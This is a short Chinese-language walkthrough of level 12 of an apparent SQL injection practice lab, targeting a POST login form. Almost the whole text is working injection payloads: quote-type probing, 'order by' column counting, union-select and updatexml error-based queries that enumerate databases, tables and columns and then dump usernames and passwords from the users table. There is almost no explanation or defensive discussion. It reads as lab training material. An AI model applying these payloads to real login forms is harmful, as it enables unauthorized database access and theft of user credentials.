SQL注入漏洞（第12关）

第十二关（POST）

1、输入uname=1&passwd=1

uname=1&passwd=1

2、判断注入类型（字符型/数字型）：

xxxxxxxxxx
uname=1&passwd=1 or 1=1 -- -  （无错误回显）
uname=1&passwd=1 or 1=2 -- -  （无错误回显，说明是字符型）

3、判断包裹符：

xxxxxxxxxx
uname=1&passwd=1'  （无错误回显）
uname=1&passwd=1"  （有错误回显，有注入，包裹符为")）

4、order确认列数（判断有几个字段）：

xxxxxxxxxx
uname=1&passwd=1") order by 2 -- -
uname=1&passwd=1") order by 3 -- -

5、union判断显示位，将列号显示出来：

xxxxxxxxxx
uname=1&passwd=1") union select 1,2 -- -

6、获取数据库的名称：

​x
uname=1&passwd=1") union select updatexml(1,concat(0x7e,database(),0x7e),1) -- -

或
uname=1&passwd=1") union select 1,database() -- -

7、查看所有的库名：

xxxxxxxxxx
uname=1&passwd=1") union select updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) -- -
（存在问题：用updatexml时报错信息会显示不全。）

或
uname=1&passwd=1") union select 1,group_concat(schema_name) from information_schema.schemata -- -

8、查看所有的表名：

xxxxxxxxxx
uname=1&passwd=1") union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) -- -

或
uname=1&passwd=1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' -- -

9、查看user表字段名（列名）:

xxxxxxxxxx
uname=1&passwd=1") union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) -- -

或
uname=1&passwd=1") union select 1,group_concat(column_name) from information_schema.columns where table_name='users' -- -

10、获取用户的数据（用户名、密码）：

xxxxxxxxxx
uname=1&passwd=1") union select updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1) -- -

或
uname=1&passwd=1") union select 1,group_concat(username,password) from security.users -- -